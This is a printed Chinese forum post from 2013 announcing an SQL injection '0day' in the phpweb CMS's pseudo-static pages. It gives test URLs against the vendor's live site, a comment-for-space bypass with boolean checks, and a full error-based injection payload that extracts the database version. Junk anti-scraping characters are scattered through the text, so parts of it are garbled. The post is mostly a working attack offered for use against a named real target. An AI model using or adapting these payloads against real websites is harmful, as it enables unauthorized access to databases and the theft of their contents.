中国网络渗透测试联盟

标题: phpweb伪静态页面注入0day [打印本页]
作者: admin    时间: 2013-1-4 19:46
标题: phpweb伪静态页面注入0day
phpweb所有的整站程序伪静态页面都存在sql注入( k8 _( b& ?: U5 @$ y

, b; p4 x, ]- |& Q0 q主站:http://phpweb.net/
' D8 |9 Y9 d: Z. F9 F. b加’检测:8 F+ A$ w! w  h" Y
2 R' g- y. _0 h4 Y/ u8 b' j) H
http://www.phpweb.net/down/html/?772′.html
0 i0 M0 _5 a$ u3 r0 g # Z% b8 q0 h# \/ q
出错
+ D3 f4 J. X/ z: s存在注入。
* D( w) i& p9 l0 v不能用空格,只能用/*罗
) [: q, t4 G- _( A+ l" I4 O/ Xhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
7 x! q. n6 \" p4 }, F$ T3 c
1 Y5 p/ y0 j6 D: ehttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
$ u& G: S' k9 X6 P- {3 d爆数据库版本:
6 j4 Y) o3 N) M* m. F0 a) L 9 s$ L9 u$ A9 T+ z: N! F/ f" b2 f( P
?
% A1 y1 _2 {) p9 k' w- y: o6 p6 [1
2 O1 q! n/ I3 G2 D& dhttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
, @1 n$ d8 R7 ~, G* s! f更新日期: 2013-01-03 13:39:50        
( X% o2 }. c2 x



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2